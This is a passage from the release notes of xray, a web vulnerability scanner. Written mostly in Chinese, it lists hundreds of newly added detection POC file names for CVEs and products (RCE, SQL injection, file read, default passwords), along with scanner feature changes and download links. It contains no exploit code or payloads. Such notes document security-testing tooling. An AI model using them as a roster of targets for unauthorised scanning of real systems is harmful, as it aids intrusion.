      • dlink-dsl-28881a-ultra-vires.yml
      • kunshi-vos3000-fileread.yml
      • reolink-nvr-configuration-disclosure-cve-2021-40150.yml
      • d-Link-dir-825-cve-2021-46442.yml
      • vite-cnvd-2022-44615.yml
      • gitblit-cve-2022-31268.yml
      • bigant-server-cve-2022-23347-lfi.yml
      • wordpress-page-builder-kingcomposer-cve-2022-0165-url-redirect.yml
      • huayu-reporter-rce.yml
      • d-link-dap-2020-cve-2021-27250.yml
      • 74cms-se-cve-2022-29720.yml
      • 74cms-se-cve-2022-33095.yml
      • pbootcms-rce-cve-2022-32417.yml
      • e-office-v10-sqli.yml
      • yonyou-nc-file-upload.yml
      • xiaomi-cve-2019-18371.yml
      • yonyou-erp-u8-file-upload.yml
      • mingyu-waf-login-bypass.yml
      • amcrest-cve-2017-8229-info-leak.yml
      • anymacro-mail-fileread.yml
      • anymacro-mail-sql-injection.yml
      • aspcms-sqli.yml
      • changjietong-downloadproxy-file-read.yml
      • cisco-router-cve-2019-1653-info-leak.yml
      • cisco-rv-series-router-cve-2021-1472-rce.yml
      • cisco-rv132w-router-cve-2018-0127-information-disclosure.yml
      • cockpit-cve-2020-35846-sqli.yml
      • discuz-cve-2019-13956-rce.yml
      • dlink-cve-2021-42627-unauth.yml
      • e-cology-loginsso-sqli.yml
      • ecology-hrmcareerapplyperview-sql.yml
      • fanweioa-signaturedownload-file-read.yml
      • fumengyun-ajaxmethod-name-sqli.yml
      • h3c-cvm-upload-file-upload.yml
      • h3c-er3100-unauth-access.yml
      • huawei-dg8045-deviceinfo-info-leak.yml
      • inspur-clusterenginev4-sysshell-remote-command-exec.yml
      • kavita-cover-upload-file-read.yml
      • kingdee-k3-cloud-mobfileupload-upload.yml
      • kkfileview-getcorsfile-ssrf.yml
      • kkfileview-xss-cve-2022-35151.yml
      • landray-oa-datajson-rce.yml
      • lg-n1a1-nas-cnnvd-201607-467-rce.yml
      • lucee-cve-2021-21307-rce.yml
      • manageengine-servicedesk-cve-2017-11512-lfi.yml
      • netgear-cnnvd-201306-024.yml
      • nuuo-nvrmini-cve-2018-14933.yml
      • oracle-ebs-bispgrapgh-file-read.yml
      • qiwang-erp-sql-injection.yml
      • reporter-file-read.yml
      • sanfor-reporter-anyfileread.yml
      • solarview-compact-rce-cve-2022-29298.yml
      • telesquare-cve-2021-46422-rce.yml
      • tongda-anywhere2017-auth-bypass.yml
      • tongda-oa-file-read.yml
      • tongda-oa-get-contactlist-php-leak-information.yml
      • tongda-oa-v11-auth-mobi-php-get-user-session.yml
      • topapp-lb-any-user-login.yml
      • totolink-cve-2022-25076-rce.yml
      • u5cms-cve-2022-32444-url-redirection.yml
      • unraid-cve-2020-5847-remote-code-execution.yml
      • vicidial-info-leak.yml
      • wanhu-ezoffice-documentedit-sqli.yml
      • wanhu-ezoffice-downloadservlet-path-traversal.yml
      • wavlink-cve-2022-2486-rce.yml
      • wavlink-cve-2022-31845.yml
      • wavlink-cve-2022-31846.yml
      • wavlink-cve-2022-34046.yml
      • wavlink-cve-2022-34049.yml
      • wavlink-cve-2022-34570-info-leak.yml
      • wavlink-nightled-remote-command-execute.yml
      • wavlink-password-disclosure-cve-2022-34047.yml
      • weaver-oa-filedownload-jsp-path-traversal.yml
      • weaver-oa-jqueryfiletree-jsp-path-traversal.yml
      • weaver-oa-sptmforportalthumbnail-jsp-path-traversal.yml
      • weaver-oa-ultra-vires.yml
      • weblogic-local-cve-2022-21371-file-inclusion.yml
      • wordpress-wp-google-maps-cve-2019-10692-sqli.yml
      • yongyou-chanjet-sql-injection.yml
      • yonyou-fe-templateoftaohong-manager-jsp-directory-traversal.yml
      • yonyou-iufo-userinformation-disclosure.yml
      • zimbra-cve-2022-27925.yml
      • zyxel-cve-2022-0342-auth-bypass.yml
      • zyxel-vmg1312-b10d-cve-2018-19326-path-traversal.yml
      • zyxel-ztp-rce-cve-2022-30525.yml
      • tongda-oa-unauth.yml
      • 74cms-cve-2020-22211-sqli.yml
      • alibaba-nacos-cve-2021-29442-unauth.yml
      • artica-pandora-fms-cve-2020-8497-unauth.yml
      • bitbucket-unauth.yml
      • citrix-cve-2020-8194-code-injection.yml
      • dahua-dss-file-read.yml
      • drawio-cve-2022-1713-ssrf.yml
      • dzzoffice-2-02-1-sc-utf8-unauth.yml
      • dzzoffice-2-02-1-sc-utf8-xss.yml
      • emerge-e3-series-cve-2022-31269.yml
      • eweaver-eoffice-ajax-upload.yml
      • glpi-barcode-cve-2021-43778-path-traversal.yml
      • glpi-telemetry-cve-2021-39211-info-leak.yml
      • gurock-testrail-cve-2021-40875-info-leak.yml
      • hwl-2511-ss-cve-2022-36554-rce.yml
      • intouch-access-anywhere-cve-2022-23854-lfi.yml
      • ispyconnect-cve-2022-29775-unauth.yml
      • kyocera-printer-cve-2020-23575-path-traversal.yml
      • laravel-filemanager-cve-2022-40734-path-traversal.yml
      • msnswitch-cve-2022-32429.yml
      • node-red-cve-2021-25864-fileread.yml
      • oracle-ebs-cve-2018-3167-ssrf.yml
      • panabit-syaddmount-command-exec.yml
      • prtg-network-monitor-cve-2020-11547-info-leak.yml
      • redash-cve-2021-41192-unauth.yml
      • springboot-jolokia-lfi.yml
      • tapestry-cve-2019-0195-readfile.yml
      • teampass-cve-2020-12478-unauth.yml
      • thinfinity-virtualui-cve-2021-44848-user-enum-unauth.yml
      • tongda-oa-gateway-path-traversal.yml
      • wapples-filrewall-cve-2022-35413.yml
      • wavlink-cve-2022-31847-info-leak.yml
      • weaver-e-cology-dbconfigreader-jsp-info-leak.yml
      • weaver-e-cology-ktreeuploadaction-upload.yml
      • weaver-e-mobile-client-do-sqli.yml
      • weaver-e-mobile-ognl-inject.yml
      • wordpress-backupbuddy-cve-2022-31474-lfi.yml
      • yonyou-u8c-file-upload.yml
      • zoho-manageengine-adaudit-plus-cve-2022-28219-xxe.yml
      • 74cms-sqli-cve-2020-22209.yml
      • aruba-instant-default-password.yml
      • cloud-oa-system-sqli.yml
      • dahua-dss-arbitrary-file-download-cnvd-2020-61986.yml
      • dell-idarc-default-password.yml
      • eyou-mail-rce-cnvd-2021-26422.yml
      • f5-big-ip-cve-2022-1388-rce.yml
      • hongfan-ioffice-oa-cnvd-2021-32400-sqli.yml
      • iceflow-vpn-cnvd-2016-10768-info-leak.yml
      • kevinlab-bems-backdoor-cve-2021-37292.yml
      • microsoft-exchange-ssrf-cve-2021-26885.yml
      • pfsense-rce-cve-2021-41282.yml
      • ruijie-eg-update-rce.yml
      • venustech-tianyue-default-password.yml
      • wanhu-ezoffice-file-upload.yml
      • weaver-eoffice-arbitrary-cnvd-2021-49104-file-upload.yml
      • xieda-oa-artibute-cnvd-2021-29066-file-read.yml
      • crawlab-users-add.yml
      • microweber-cve-2022-0666.yml
      • ucms-v148-cve-2020-25483.yml
      • wordpress-photo-gallery-cve-2022-1281.yml
      • eoffice10-file-upload.yml
      • topsec-rce.yml
      • weaver-oa-workrelate-file-upload.yml
      • zentao-sqli-cnvd-2022-42853.yml
      • dataease-cve-2022-34114.yml
      • gogs-cve-2018-18925-rce.yml
      • landray-oa-treexml-rce.yml
      • node-red-file-read.yml
      • specoweb-cve-2021-32572-fileread.yml
      • wi-fi-web-rce.yml
      • yonyou-ksoa-file-upload.yml
      • wanhu-oa-officeserver-file-upload.yml
      • yonyou-grp-u8-file-upload.yml
      • cobub-channel-cve-2018-8057-sqli.yml
      • cuberite-cve-2019-15516.yml
      • greencms-cve-2018-12604.yml
      • junams-fileupload-cnvd-2020-24741.yml
      • rconfig-cve-2020-10546.yml
      • rconfig-cve-2020-10547.yml
      • rconfig-cve-2020-10548.yml
      • rconfig-cve-2020-10549.yml
      • strs-mas-remote-command-exec.yml
      • webgrind-index-cve-2018-12909-fileread.yml
      • youphptube-cve-2019-18662.yml
      • apache-spark-rce-cve-2022-33891.yml
      • confluence-cve-2022-26138.yml
      • h3c-route-unauthorized.yml
      • nps-auth-bypass.yml
      • seeyon-default-password.yml
      • spiderflow-save-remote-command-execute.yml
      • spring-cve-2020-5398-rfd.yml
      • topsec-defalut-password.yml
      • weaver-oa-cnvd-2022-43245.yml
      • yonyou-nc-file-accept-upload.yml
      • yonyou-nc-xxe.yml
      • zhiyuan-oa-fanruan-info-leak.yml
      • zhiyuan-oa-wpsassistservlet-file-upload.yml
      • fanruan-v9-file-upload.yml
      • hexinchuang-cloud-desktop-file-upload.yml
      • hongfan-oa-sqli.yml
      • kingsoft-tss-v8-file-upload.yml
      • lianruan-uninac-fileupload.yml
      • nagiosxi-cve-2020-35578-rce.yml
      • topsec-topapp-lb-sqli.yml
      • trs-was5-file-read.yml
      • weaver-emobile-v6-sqli.yml
      • wordpress-file-manager-cve-2020-25213-file-upload.yml
      • zentao-v11-sqli.yml
      • vbulletin-cve-2015-7808.yml
      • yonyou-chanjet-file-upload.yml
    2. 对如下插件规则进行修复,增强:
      • full-read-ssrf-in-spring-cloud-netflix.yml
      • wuzhicms-v410-sqli.yml
      • nexusdb-cve-2020-24571-path-traversal.yml
      • joomla-cve-2015-7297-sqli.yml
      • joomla-cve-2017-8917-sqli.yml
      • zcms-v3-sqli.yml
      • 74cms-sqli.yml
      • discuz-v72-sqli.yml
      • duomicms-sqli.yml
      • seacms-sqli.yml
      • f5-big-ip-cve-2022-1388-rce.yml
      • nginx-cve-2017-7529-info-leak.yml
      • cerebro-request-ssrf.yml
      • openfire-cve-2019-18394-ssrf.yml
      • prometheus-url-redirection-cve-2021-29622.yml
      • zoho-cve-2022-23779-info-leak.yml
      • xunchi-cnvd-2020-23735-file-read.yml
      • 74cms-se-cve-2022-33095.yml
      • e-office-v10-sqli.yml
      • weaver-emobile-v6-sqli.yml
      • mingyu-waf-login-bypass.yml
      • confluence-cve-2021-26084-rce
      • hadoop-yarn-unauthorized-access
      • confluence-cve-2019-3396-path-traversal
      • httpd-ssrf-cve-2021-40438
      • terramaster-cve-2020-28188-rce
      • laravel-cve-2021-3129-rce
      • seeyon-oa-arbitrary-auth
      • qizhi-unauthorized-access
      • yonyou-nc-javabeanshell-rce
      • apache-httpd-cve-2021-41773
      • gitlab-cve-2021-22214-ssrf
      • niushop-attrarray-sqli
      • phpmyadmin-wooyun-2016-199433-deserialization
      • php-cgi-cve-2012-1823-rce
      • apache-druid-cve-2021-36749-file-read
      • elasticsearch-cve-2015-3337
    Source code(tar.gz)
    Source code(zip)
    sha256.txt(1.21 KB)
    xray_darwin_amd64.zip(29.14 MB)
    xray_darwin_arm64.zip(28.34 MB)
    xray_linux_386.zip(27.92 MB)
    xray_linux_amd64.zip(28.89 MB)
    xray_linux_arm64.zip(27.68 MB)
    xray_windows_386.exe.zip(27.12 MB)
    xray_windows_amd64.exe.zip(27.70 MB)
  • 1.8.4(Jan 30, 2022)

    • 新增如下热门漏洞 poc,感谢师傅们的提交,更新后即可自动加载
      • apache-storm-unauthorized-access.yml
      • confluence-cve-2021-26085-arbitrary-file-read.yml
      • dahua-cve-2021-33044-authentication-bypass.yml
      • exchange-cve-2021-41349-xss.yml
      • gocd-cve-2021-43287.yml
      • grafana-default-password.yml
      • hikvision-unauthenticated-rce-cve-2021-36260.yml
      • jellyfin-cve-2021-29490.yml
      • jinher-oa-c6-default-password.yml
      • kingdee-eas-directory-traversal.yml
      • pentaho-cve-2021-31602-authentication-bypass.yml
      • qilin-bastion-host-rce.yml
      • secnet-ac-default-password.yml
      • spon-ip-intercom-file-read.yml
      • spon-ip-intercom-ping-rce.yml
    • yaml 脚本部分更新
      • 增加了 http request 和 response 的 raw_header 方法
      • 增加了 bicontains 和 faviconHash 函数
      • 增加了 payloads 结构
      • 增加了 http path 的表达能力,使用 ^ 来访问绝对路径
      • 文档更新 更新 PR
        • 更新了上面新增的内容
        • 更新了如何处理转义字符的说明,并提出了 multipart 中\r\n 的解决方法
        • 更新了 http path 如何使用的文档
        • 更新了 payload 如何使用的文档
        • 更新了 webhook 的部分内容

    PS:祝大家春节快乐 ✿✿ヽ(°▽°)ノ✿

    Source code(tar.gz)
    Source code(zip)
    sha256.txt(1.22 KB)
    xray_darwin_amd64.zip(19.47 MB)
    xray_darwin_arm64.zip(18.60 MB)
    xray_linux_386.zip(17.65 MB)
    xray_linux_amd64.zip(19.36 MB)
    xray_linux_arm.zip(19.36 MB)
    xray_linux_arm64.zip(17.43 MB)
    xray_windows_386.exe.zip(17.80 MB)
    xray_windows_amd64.exe.zip(19.21 MB)
  • 1.8.2(Nov 7, 2021)

    • 新增如下热门漏洞 poc,感谢师傅们的提交,更新后即可自动加载
      • apache-ambari-default-password.yml
      • apache-druid-cve-2021-36749.yml
      • apache-httpd-cve-2021-40438-ssrf.yml
      • apache-httpd-cve-2021-41773-path-traversal.yml
      • apache-httpd-cve-2021-41773-rce.yml
      • apache-nifi-api-unauthorized-access.yml
      • e-zkeco-cnvd-2020-57264-read-file.yml
      • ecology-arbitrary-file-upload.yml
      • ecshop-collection-list-sqli.yml
      • h5s-video-platform-cnvd-2020-67113-unauth.yml
      • hikvision-intercom-service-default-password.yml
      • jetty-cve-2021-28164.yml
      • laravel-cve-2021-3129.yml
      • novnc-url-redirection-cve-2021-3654.yml
      • ruijie-eg-cli-rce.yml
      • ruijie-eg-file-read.yml
      • tvt-nvms-1000-file-read-cve-2019-20085.yml
      • zzcms-zsmanage-sqli.yml
    • 子域名爆破配置文件修改,调高了子域名爆破的默认并发(subdomain.max_parallel 30 -> 500),添加了新增 API 的配置,新增 API 包括(可以重新生成配置,也可以在 subdomain.sources 直接添加):
        alienvault:
          enabled: true
        bufferover:
          enabled: true
        fofa:
          enabled: false
          email: ""
          key: ""
        ip138:
          enabled: true
        myssl:
          enabled: true
        riskiq:
          enabled: false
          user: ""
          key: ""
        quake:
          enabled: false
          key: ""
    
    • 修复 lint 会跳过文件的问题
    • 修复了子域名爆破日志太多的问题,降低了部分日志的 log level
    • 修复了 --poc 指定内置 poc 时,任何 poc 都不会加载的问题
    • 修复了转换旧格式脚本可能的 panic 问题
    Source code(tar.gz)
    Source code(zip)
    sha256.txt(1.22 KB)
    xray_darwin_amd64.zip(19.37 MB)
    xray_darwin_arm64.zip(18.50 MB)
    xray_linux_386.zip(17.56 MB)
    xray_linux_amd64.zip(19.27 MB)
    xray_linux_arm.zip(19.27 MB)
    xray_linux_arm64.zip(17.35 MB)
    xray_windows_386.exe.zip(17.70 MB)
    xray_windows_amd64.exe.zip(19.10 MB)
  • 1.8.1(Oct 26, 2021)

    • 推出了自定义脚本的 V2 版本
      • 修改了 lintpoc 命令
      • 添加了 transform v1 命令用于 v1 格式的转换
      • 文档更新 https://docs.xray.cool/#/guide/poc/v2
    • 子域名爆破添加了一些插件,可在 config.yml 查看具体内容
    • 升级 go 版本到 1.17, 支持了 mac M1 (xray_darwin_arm64
    • 修复了一些问题
      • 修复了自动更新的问题
      • 修复了子域名爆破缓慢的问题
      • 优化了重名 poc 加载问题,只打印 log,不退出,以系统内置的为准
    • 新增如下热门漏洞 poc,感谢师傅们的提交,更新后即可自动加载。
      • alibaba-canal-default-password.yml
      • amtt-hiboss-server-ping-rce.yml
      • confluence-cve-2021-26084.yml
      • datang-ac-default-password-cnvd-2021-04128.yml
      • dlink-cve-2020-25078-account-disclosure.yml
      • dubbo-admin-default-password.yml
      • ecology-v8-sqli.yml
      • eea-info-leak-cnvd-2021-10543.yml
      • elasticsearch-cve-2015-5531.yml
      • f5-cve-2021-22986.yml
      • gateone-cve-2020-35736.yml
      • gitlab-graphql-info-leak-cve-2020-26413.yml
      • gitlab-ssrf-cve-2021-22214.yml
      • gitlist-rce-cve-2018-1000533.yml
      • h3c-imc-rce.yml
      • h3c-secparh-any-user-login.yml
      • hanming-video-conferencing-file-read.yml
      • hikvision-info-leak.yml
      • hjtcloud-arbitrary-fileread.yml
      • hjtcloud-directory-file-leak.yml
      • huawei-home-gateway-hg659-fileread.yml
      • iis-put-getshell.yml
      • inspur-tscev4-cve-2020-21224-rce.yml
      • jeewms-showordownbyurl-fileread.yml
      • jellyfin-file-read-cve-2021-21402.yml
      • kingsoft-v8-default-password.yml
      • kingsoft-v8-file-read.yml
      • kubernetes-unauth.yml
      • kyan-network-monitoring-account-password-leakage.yml
      • landray-oa-custom-jsp-fileread.yml
      • metinfo-file-read.yml
      • mpsec-isg1000-file-read.yml
      • natshell-arbitrary-file-read.yml
      • netentsec-icg-default-password.yml
      • netentsec-ngfw-rce.yml
      • node-red-dashboard-file-read-cve-2021-3223.yml
      • ns-asg-file-read.yml
      • panabit-gateway-default-password.yml
      • panabit-ixcache-default-password.yml
      • pbootcms-database-file-download.yml
      • prometheus-url-redirection-cve-2021-29622.yml
      • qizhi-fortressaircraft-unauthorized.yml
      • rabbitmq-default-password.yml
      • ruijie-eweb-rce-cnvd-2021-09650.yml
      • ruijie-nbr1300g-cli-password-leak.yml
      • ruijie-uac-cnvd-2021-14536.yml
      • ruoyi-management-fileread.yml
      • saltstack-cve-2021-25282-file-write.yml
      • samsung-wlan-ap-wea453e-rce.yml
      • sangfor-ba-rce.yml
      • seeyon-a6-employee-info-leak.yml
      • seeyon-a6-test-jsp-sql.yml
      • seeyon-oa-cookie-leak.yml
      • seeyon-session-leak.yml
      • shiziyu-cms-apicontroller-sqli.yml
      • shopxo-cnvd-2021-15822.yml
      • showdoc-default-password.yml
      • showdoc-uploadfile.yml
      • skywalking-cve-2020-9483-sqli.yml
      • solr-fileread.yml
      • tamronos-iptv-rce.yml
      • telecom-gateway-default-password.yml
      • tianqing-info-leak.yml
      • tongda-user-session-disclosure.yml
      • tpshop-directory-traversal.yml
      • vmware-vrealize-cve-2021-21975-ssrf.yml
      • weiphp-path-traversal.yml
      • weiphp-sql.yml
      • wifisky-default-password-cnvd-2021-39012.yml
      • xdcms-sql.yml
      • yapi-rce.yml
      • yongyou-u8-oa-sqli.yml
      • yonyou-nc-bsh-servlet-bshservlet-rce.yml
      • zabbix-default-password.yml
    Source code(tar.gz)
    Source code(zip)
    sha256.txt(1.22 KB)
    xray_darwin_amd64.zip(19.34 MB)
    xray_darwin_arm64.zip(18.46 MB)
    xray_linux_386.zip(17.52 MB)
    xray_linux_amd64.zip(19.23 MB)
    xray_linux_arm.zip(19.23 MB)
    xray_linux_arm64.zip(17.30 MB)
    xray_windows_386.exe.zip(17.66 MB)
    xray_windows_amd64.exe.zip(19.07 MB)
  • 1.7.1(Mar 18, 2021)

    • 优化自定义POC开发体验。
      • 优化poc加载逻辑,通过 webscan -poc 指定poc时无需再添加 --plugin phantasm 参数。
      • 新增自动加载本地自定义POC配置 auto_load_poc ,启用后,除内置poc外,会自动加载当前目录以 "poc-" 为文件名前缀的POC文件。
      • 增加指令别名。如 ws 等同于 webscan-u 等同于 -url-p 等同于 -poc。详细改动可通过 --help 查看。
        • 例如,可使用如下命令,仅运行当前目录下的 poc 且 不运行内置 poc 进行测试:ws -p ./poc-* -u http://example.com
    • 首次启动自动生成配置文件,优化新用户使用体验。
    • 修复部分插件误报的问题,优化扫描效果。
    • 新增如下poc,感谢师傅们的提交,更新后即可自动加载。
      • poc-yaml-activemq-default-password
      • poc-yaml-airflow-unauth
      • poc-yaml-alibaba-canal-info-leak
      • poc-yaml-apache-kylin-unauth-cve-2020-13937
      • poc-yaml-ecshop-cnvd-2020-58823-sqli
      • poc-yaml-ecshop-rce
      • poc-yaml-exchange-cve-2021-26855-ssrf
      • poc-yaml-odoo-file-read
      • poc-yaml-rockmongo-default-password
      • poc-yaml-sonicwall-ssl-vpn-rce
      • poc-yaml-vmware-vcenter-unauthorized-rce-cve-2021-21972
      • poc-yaml-yonyou-grp-u8-sqli
    Source code(tar.gz)
    Source code(zip)
    sha256.txt(1.13 KB)
    xray_darwin_amd64.zip(19.36 MB)
    xray_linux_386.zip(17.52 MB)
    xray_linux_amd64.zip(19.31 MB)
    xray_linux_arm.zip(19.31 MB)
    xray_linux_arm64.zip(17.36 MB)
    xray_windows_386.exe.zip(17.59 MB)
    xray_windows_amd64.exe.zip(19.07 MB)
  • 1.7.0(Jan 20, 2021)

    国内用户可以从 https://download.xray.cool/ 进行下载,速度更快。

    • webscan 增加 --burp-file xxx 的输入来源,可以用于解析 burp 的导出文件并扫描
    • 为 yaml poc 增加 response.latency 表示响应延迟,单位毫秒
    • 修复 yaml poc 对 bytes 替换的问题,可以编写 body 是 bytes 的 poc 了
    • 新增如下热门漏洞 poc,共计 29 个,感谢社区师傅们的提交,下列 poc 更新后即可自动加载
      • poc-yaml-alibaba-nacos-v1-auth-bypass
      • poc-yaml-chinaunicom-modem-default-password
      • poc-yaml-citrix-xenmobile-cve-2020-8209
      • poc-yaml-craftcms-seomatic-cve-2020-9757-rce
      • poc-yaml-dlink-dsl-2888a-rce
      • poc-yaml-dotnetcms-sqli
      • poc-yaml-flink-jobmanager-cve-2020-17519-lfi
      • poc-yaml-frp-dashboard-unauth
      • poc-yaml-go-pprof-leak
      • poc-yaml-jira-cve-2019-8442
      • poc-yaml-jumpserver-unauth-rce
      • poc-yaml-kafka-manager-unauth
      • poc-yaml-lanproxy-cve-2021-3019-lfi
      • poc-yaml-nps-default-password
      • poc-yaml-opentsdb-cve-2020-35476-rce
      • poc-yaml-ruijie-eg-rce
      • poc-yaml-samsung-wea453e-default-pwd
      • poc-yaml-samsung-wea453e-rce
      • poc-yaml-seeyon-ajax-unauthorized-access
      • poc-yaml-seeyon-cnvd-2020-62422-readfile
      • poc-yaml-solarwinds-cve-2020-10148
      • poc-yaml-sonarqube-cve-2020-27986-unauth
      • poc-yaml-springboot-env-unauth
      • poc-yaml-terramaster-cve-2020-15568
      • poc-yaml-terramaster-cve-2020-28188-rce
      • poc-yaml-vmware-vcenter-arbitrary-file-read
      • poc-yaml-yonyou-nc-arbitrary-file-upload
      • poc-yaml-zeit-nodejs-cve-2020-5284-directory-traversal
      • poc-yaml-zeroshell-cve-2019-12725-rce
    Source code(tar.gz)
    Source code(zip)
    sha256.txt(1.13 KB)
    xray_darwin_amd64.zip(19.49 MB)
    xray_linux_386.zip(17.55 MB)
    xray_linux_amd64.zip(19.35 MB)
    xray_linux_arm.zip(19.35 MB)
    xray_linux_arm64.zip(17.39 MB)
    xray_windows_386.exe.zip(17.63 MB)
    xray_windows_amd64.exe.zip(19.10 MB)
  • 1.6.0(Dec 25, 2020)

    Features:

    • poc 增加规则组的概念 groups,可以在一个 yaml 写多组规则表示同一漏洞的不同情况,详见文档

    • poc 增加 sleep 函数,表示暂停执行当前上下文多少秒

    • 升级 go 编译器版本至 1.15.6

    • windows 下使用新的图标构建应用

    • 感谢师傅们提交的如下 POC,xray 更新后即可自动加载,无需改动配置文件

      • poc-yaml-jira-cve-2020-14179 @harris2015
      • poc-yaml-minio-default-password @harris2015
      • poc-yaml-kibana-cve-2018-17246 @canc3s
      • poc-yaml-seeyon-wooyun-2015-148227 @canc3s
      • poc-yaml-laravel-improper-webdir @Dem0ns
      • poc-yaml-powercreator-arbitrary-file-upload @MrP01ntSu
      • poc-yaml-h2-database-web-console-unauthorized-access @jujumanman

    Fixes:

    • 修复 dirscan 因 partial 导致的误报问题

    • 修复 dirscan svn 规则容易误报的问题

    • 修复 dirscan 自定义字典报错提前退出的问题

    • 修复 struts 过滤规则过严导致漏洞扫不出的问题

    • 修复多个 poc rule 报告中只显示最后一个请求响应的问题

    • 修复单 url 扫描可能提前退出的问题

    Source code(tar.gz)
    Source code(zip)
    sha256.txt(1.13 KB)
    xray_darwin_amd64.zip(19.48 MB)
    xray_linux_386.zip(17.54 MB)
    xray_linux_amd64.zip(19.33 MB)
    xray_linux_arm.zip(19.33 MB)
    xray_linux_arm64.zip(17.39 MB)
    xray_windows_386.exe.zip(17.62 MB)
    xray_windows_amd64.exe.zip(19.10 MB)
  • 1.5.0(Nov 24, 2020)

    国内用户可以从 https://download.xray.cool/ 进行下载,速度更快

    Features:

    • shiro 检测增加对 gcm 加密方式的支持,现在会使用 gcm 和 cbc 模式分别进行探测

    • cors 支持检测允许任意源携带认证信息 baseline/cors/any-origin-with-credential

    Fixes:

    • 修复统计错误导致的疑似卡住问题

    • 修复 detect_xss_in_cookie 配置失效的问题 https://github.com/chaitin/xray/issues/942

    Source code(tar.gz)
    Source code(zip)
    sha256.txt(1.13 KB)
    xray_darwin_amd64.zip(20.98 MB)
    xray_linux_386.zip(18.70 MB)
    xray_linux_amd64.zip(20.33 MB)
    xray_linux_arm.zip(18.45 MB)
    xray_linux_arm64.zip(18.41 MB)
    xray_windows_386.exe.zip(18.25 MB)
    xray_windows_amd64.exe.zip(19.87 MB)
  • 1.4.5(Nov 18, 2020)

    国内用户可以从 https://download.xray.cool/ 进行下载,速度更快

    Features:

    • 增加 convert 命令,用于 json 和 html 结果的互相转换,漏洞结果和子域名均支持转换

      • xray convert --from 1.json --to 1.html
      • xray convert --from 1.html --to 1.json
    • 同步社区新增 POC,无需更新配置文件即可使用

      • poc-yaml-saltstack-cve-2020-16846
      • poc-yaml-dlink-cve-2020-9376-dump-credentials
    • 增加国内下载站,支持通过 ./xray upgrade 一键快速更新

    Fixes:

    • 修复因调度问题导致的 shiro 扫不出利用链的问题 https://github.com/chaitin/xray/issues/928

    • 修复基础爬虫/浏览器爬虫设置代理无效的问题 https://github.com/chaitin/xray/issues/926

    • 修复因请求跳转导致的 shiro 漏报问题

    • 修复部分漏洞输出的请求响应不正确的问题

    • 修复 phantasm 加载 poc 的一系列问题

    • 进一步修复系统路径泄露的误报问题

    • 修复远程反连的情况下健康检查失败的问题

    Changes:

    • 对非 html 类型的响应在输出漏洞时做了 64K 的大小限制,防止生成的报告过大

    • 为避免磁盘占用过大,windows 下去重不再使用 badger,而是直接使用 syncmap

    • webhook 不再使用配置文件中的代理

    Source code(tar.gz)
    Source code(zip)
    sha256.txt(1.13 KB)
    xray_darwin_amd64.zip(20.97 MB)
    xray_linux_386.zip(18.70 MB)
    xray_linux_amd64.zip(20.32 MB)
    xray_linux_arm.zip(18.44 MB)
    xray_linux_arm64.zip(18.40 MB)
    xray_windows_386.exe.zip(18.24 MB)
    xray_windows_amd64.exe.zip(19.86 MB)
  • 1.4.2(Nov 10, 2020)

    该版本修复了上一版本中比较影响使用的问题,包括

    • 修复配置文件部分项不起作用的问题
    • 修复系统路径泄露误报比较多的问题
    • 修复 windows 下 badger 数据多次访问的问题
    • 修复 mitm 数据缓存残留问题
    • 文件输出异常时的 panic 的问题
    Source code(tar.gz)
    Source code(zip)
    sha256.txt(1.13 KB)
    xray_darwin_amd64.zip(20.97 MB)
    xray_linux_386.zip(18.69 MB)
    xray_linux_amd64.zip(20.31 MB)
    xray_linux_arm.zip(18.44 MB)
    xray_linux_arm64.zip(18.39 MB)
    xray_windows_386.exe.zip(18.59 MB)
    xray_windows_amd64.exe.zip(20.22 MB)
  • 1.4.0(Nov 6, 2020)

    Hi,好久不见。在这看似宁静的一个月里我们并没有停下脚步,而是由内而外的对 xray 做了亿点点调整。 这是一个充满 Break Change 的版本,不可避免的会出现一些新的 Bug,希望大家能及时反馈以便我们修复。

    Features:

    • 更换为基于事件驱动的插件调度器,同时重新定义内部插件结构,细化插件粒度;去除了调度中大量消息同步逻辑。总之就是更快、更强

    • 采用全新的配置文件结构,同时改进配置加载方式,后续无需删除原配置文件即可使用各种新特性、新 POC

    • 全局更换基于 badger 的新型过滤器,只要存储足够大,轻松过滤一个亿

    • 为 phantasm 增加两项新配置,均支持 glob 语法进行批量匹配

      • local_poc 加载本地的 poc, 如:/home/poc/*
      • exclude_poc 排除哪些 poc,如 /home/poc/*web*poc-yaml-weblogic*
    • 增加多种针对资源限制的配置定义,可以按需使用,具体支持的例子参照配置文件说明

      • hostname_allowed 允许访问的 hostname,不带端口
      • port_allowed 允许访问的端口
      • path_allowed 允许访问的 url path
      • query_key_allowed 允许访问的 url query key
      • post_key_allowed 允许访问的请求 body 的 key
      • fragment_allowed 允许访问的 fragment
    • 增加 baseline 插件的检测项

      • detect_system_path_leak 检查响应是否包含系统路径泄露
      • detect_private_ip 检查响应是否包含内网 ip
    • 同步社区新增 POC

      • poc-yaml-jira-cve-2020-14181 jira 用户枚举漏洞
      • poc-yaml-weblogic-cve-2020-14750 Weblogic console 权限绕过漏洞
      • poc-yaml-seacmsv645-command-exec seacms 某rce
      • poc-yaml-seacms-before-v992-rce seacms 某rce
    • 增加在注入点在 cookie 中的 sqli 检测,默认开启且可配置

    • webscan 增加 --list 参数,用于展示所有内置的可用插件

    • 优化部分界面的交互体验,增加更多提示信息

    BugFixes:

    • 修复 dirscan 逻辑问题导致的错误文件名拼接

    • 改进页面相似度比较算法,可以修复部分 sql 注入和 dirscan 的误报问题

    • 尝试修复 poc-yaml-phpstudy-nginx-wrong-resolve 误报较多的问题

    Changes:

    • 调整漏洞输出结构,改动将影响 json/html/webhook 输出,文档稍后补充

    • 反连平台不再默认启动,需要用户手动配置后使用,否则部分漏洞扫不出

    • 融合社区高级版和社区普通版的配置文件,高级版特有的命令普通用户也可见,但非高级版用户无法使用

    • 子域名的 HTML 报告名改为后缀添加,比如 example.com.htmlexample.com-500.html

    Source code(tar.gz)
    Source code(zip)
    sha256.txt(1.13 KB)
    xray_darwin_amd64.zip(20.96 MB)
    xray_linux_386.zip(18.69 MB)
    xray_linux_amd64.zip(20.32 MB)
    xray_linux_arm.zip(18.45 MB)
    xray_linux_arm64.zip(18.39 MB)
    xray_windows_386.exe.zip(18.59 MB)
    xray_windows_amd64.exe.zip(20.22 MB)
  • 1.3.3(Sep 17, 2020)

    该版本修复了上一版本 html 报告的问题。

    Featues:

    • 同步社区新增检测 POC,支持当下热门漏洞检测,需自行合并到配置文件或重新生成配置文件来使用 ,仅更新版本不更新配置文件不会生效!

      • poc-yaml-yonyou-grp-u8-sqli-to-rce 用友 GRP-U8 注入&远程命令执行
